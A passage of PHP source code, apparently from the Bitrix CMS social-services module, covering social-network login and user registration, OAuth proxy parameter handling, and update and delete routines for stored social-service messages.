$USER_ID = $socservUser["USER_ID"];
}
}
else
{
foreach(GetModuleEvents('socialservices', 'OnFindSocialservicesUser', true) as $event)
{
$eventResult = ExecuteModuleEventEx($event, array(&$socservUserFields));
if($eventResult > 0)
{
$USER_ID = $eventResult;
break;
}
}
if(!$USER_ID)
{
if
(
COption::GetOptionString("main", "new_user_registration", "N") == "Y"
&& COption::GetOptionString("socialservices", "allow_registration", "Y") == "Y"
)
{
$socservUserFields['PASSWORD'] = randString(30); //not necessary but...
$socservUserFields['LID'] = SITE_ID;
$def_group = Option::get('main', 'new_user_registration_def_group', '');
if($def_group <> '')
{
$socservUserFields['GROUP_ID'] = explode(',', $def_group);
}
if(
$this->checkRestrictions
&& !empty($socservUserFields['GROUP_ID'])
&& self::isAuthDenied($socservUserFields['GROUP_ID'])
)
{
$errorCode = SOCSERV_REGISTRATION_DENY;
}
else
{
$userFields = $socservUserFields;
$userFields["EXTERNAL_AUTH_ID"] = "socservices";
if(isset($userFields['PERSONAL_PHOTO']) && is_array($userFields['PERSONAL_PHOTO']))
{
$res = CFile::CheckImageFile($userFields["PERSONAL_PHOTO"]);
if($res <> '')
{
unset($userFields['PERSONAL_PHOTO']);
}
}
$USER_ID = $USER->Add($userFields);
if($USER_ID <= 0)
{
$errorCode = SOCSERV_AUTHORISATION_ERROR;
}
}
}
elseif(Option::get("main", "new_user_registration", "N") == "N")
{
$errorCode = SOCSERV_REGISTRATION_DENY;
}
$socservUserFields['CAN_DELETE'] = 'N';
}
}
if(isset($_SESSION["OAUTH_DATA"]) && is_array($_SESSION["OAUTH_DATA"]))
{
foreach ($_SESSION['OAUTH_DATA'] as $key => $value)
{
$socservUserFields[$key] = $value;
}
unset($_SESSION["OAUTH_DATA"]);
}
if($USER_ID > 0)
{
$arGroups = $USER->GetUserGroup($USER_ID);
if($this->checkRestrictions && self::isAuthDenied($arGroups))
{
return SOCSERV_AUTHORISATION_ERROR;
}
if($entryId > 0)
{
UserTable::update($entryId, UserTable::filterFields($socservUserFields));
}
else
{
$socservUserFields['USER_ID'] = $USER_ID;
UserTable::add(UserTable::filterFields($socservUserFields));
}
if(isset($socservUserFields["TIME_ZONE_OFFSET"]) && $socservUserFields["TIME_ZONE_OFFSET"] !== null)
{
CTimeZone::SetCookieValue($socservUserFields["TIME_ZONE_OFFSET"]);
}
$USER->AuthorizeWithOtp($USER_ID);
if($USER->IsJustAuthorized())
{
foreach(GetModuleEvents("socialservices", "OnUserLoginSocserv", true) as $arEvent)
{
ExecuteModuleEventEx($arEvent, array($socservUserFields));
}
}
}
else
{
return $errorCode;
}
// possible redirect after authorization, so no spreading. Store cookies in the session for next hit
$APPLICATION->StoreCookies();
}
return true;
}
public static function OnFindExternalUser($login)
{
global $DB;
$res = $DB->Query("
SELECT bsu.USER_ID
FROM b_socialservices_user bsu
LEFT JOIN b_user bu ON bsu.USER_ID=bu.ID
WHERE bsu.LOGIN='".$DB->ForSql($login)."' AND bu.ACTIVE='Y'
");
if(($user = $res->Fetch()))
{
return $user["USER_ID"];
}
return 0;
}
public function setAllowChangeOwner($value)
{
$this->allowChangeOwner = (bool)$value;
}
}
//some repetitive functionality
class CSocServUtil
{
const OAUTH_PACK_PARAM = "oauth_proxy_params";
private static $oAuthParams = array("redirect_uri", "client_id", "scope", "response_type", "state");
public static function GetCurUrl($addParam="", $removeParam=false, $checkOAuthProxy=true)
{
global $APPLICATION;
$arRemove = array("logout", "auth_service_error", "auth_service_id", "MUL_MODE", "SEF_APPLICATION_CUR_PAGE_URL");
if($removeParam !== false)
{
$arRemove = array_merge($arRemove, $removeParam);
}
if($checkOAuthProxy !== false)
{
$proxyString = "";
foreach(self::$oAuthParams as $param)
{
if(isset($_GET[$param]))
{
$arRemove[] = $param;
$proxyString .= ($proxyString == "" ? "" : "&").urlencode($param)."=".urlencode($_GET[$param]);
}
}
if($proxyString != "")
{
$addParam .= ($addParam == "" ? "" : "&").self::packOAuthProxyString($proxyString);
}
}
return \CHTTP::URN2URI($APPLICATION->GetCurPageParam($addParam, $arRemove));
}
/**
* @deprecated Use \CHTTP::URN2URI instead
*/
public static function ServerName($forceHttps = false)
{
$request = Context::getCurrent()->getRequest();
$protocol = ($forceHttps || $request->isHttps()) ? "https" : "http";
$serverName = $request->getHttpHost();
// :-(
if($protocol == "https")
{
$serverName = str_replace(":443", "", $serverName);
}
return $protocol.'://'.$serverName;
}
public static function packOAuthProxyString($proxyString)
{
return self::OAUTH_PACK_PARAM."=".urlencode(base64_encode($proxyString));
}
public static function getOAuthProxyString()
{
return isset($_REQUEST[self::OAUTH_PACK_PARAM]) ? self::OAUTH_PACK_PARAM."=".urlencode($_REQUEST[self::OAUTH_PACK_PARAM]) : '';
}
public static function checkOAuthProxyParams()
{
if(isset($_REQUEST[self::OAUTH_PACK_PARAM]) && strlen($_REQUEST[self::OAUTH_PACK_PARAM]) > 0)
{
$proxyString = base64_decode($_REQUEST[self::OAUTH_PACK_PARAM]);
if(strlen($proxyString) > 0)
{
$arVars = array();
parse_str($proxyString, $arVars);
foreach(self::$oAuthParams as $param)
{
if(isset($arVars[$param]))
{
$_GET[$param] = $_REQUEST[$param] = $arVars[$param];
}
}
}
unset($_REQUEST[self::OAUTH_PACK_PARAM]);
unset($_GET[self::OAUTH_PACK_PARAM]);
}
}
}
class CSocServAllMessage
{
protected function CheckFields($action, &$arFields)
{
if(($action == "ADD" && !isset($arFields["SOCSERV_USER_ID"])) || (isset($arFields["SOCSERV_USER_ID"]) && intval($arFields["SOCSERV_USER_ID"])<=0))
{
return false;
}
if(($action == "ADD" && !isset($arFields["PROVIDER"])) || (isset($arFields["PROVIDER"]) && strlen($arFields["PROVIDER"])<=0))
{
return false;
}
if($action == "ADD")
$arFields["INSERT_DATE"] = ConvertTimeStamp(time(), "FULL");
return true;
}
static function Update($id, $arFields)
{
global $DB;
$id = intval($id);
if($id<=0 || !self::CheckFields('UPDATE', $arFields))
return false;
$strUpdate = $DB->PrepareUpdate("b_socialservices_message", $arFields);
$strSql = "UPDATE b_socialservices_message SET ".$strUpdate." WHERE ID = ".$id." ";
$DB->Query($strSql, false, "File: ".__FILE__."<br>Line: ".__LINE__);
$cache_id = 'socserv_mes_user';
$obCache = new CPHPCache;
$cache_dir = '/bx/socserv_mes_user';
$obCache->Clean($cache_id, $cache_dir);
return $id;
}
static function Delete($id)
{
global $DB;
$id = intval($id);
if ($id > 0)
{
$rsUser = $DB->Query("SELECT ID FROM b_socialservices_message WHERE ID=".$id);
$arUser = $rsUser->Fetch();
if(!$arUser)
return false;
$DB->Query("DELETE FROM b_socialservices_message WHERE ID = ".$id." ", true);
$cache_id = 'socserv_mes_user';
$obCache = new CPHPCache;
$cache_dir = '/bx/socserv_mes_user';
$obCache->Clean($cache_id, $cache_dir);
return true;
}
return false;
}
}